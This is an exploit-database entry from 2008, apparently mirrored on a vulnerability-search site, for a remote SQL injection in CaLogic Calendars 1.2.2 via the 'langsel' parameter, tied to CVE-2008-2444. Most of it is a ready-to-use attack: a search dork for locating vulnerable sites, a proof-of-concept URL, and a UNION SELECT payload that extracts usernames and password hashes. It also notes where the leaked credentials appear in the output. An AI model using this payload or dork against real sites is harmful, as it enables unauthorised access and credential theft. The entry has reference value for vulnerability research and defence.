Lucene search
His0k4EDB-ID:5607HistoryMay 13, 2008 - 12:00 a.m.
CaLogic Calendars 1.2.2 - 'langsel' SQL Injection
2008-05-1300:00:00
His0k4
www.exploit-db.com
49
AI Score
7.4
Confidence
Low
/---------------------------------------------------------------\
\ /
/ CaLogic Calendars V1.2.2 Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : "CaLogic Calendars V1.2.2"
[*] POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
[*] Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
[*] Note : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'}
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-05-13]Related
cvelist
cvelist
CVE-2008-2444
2008-05-27 14:00:00
nvd
nvd
CVE-2008-2444
2008-05-27 14:32:00
cve
cve
CVE-2008-2444
2008-05-27 14:32:00
prion
prion
Sql injection
2008-05-27 14:32:00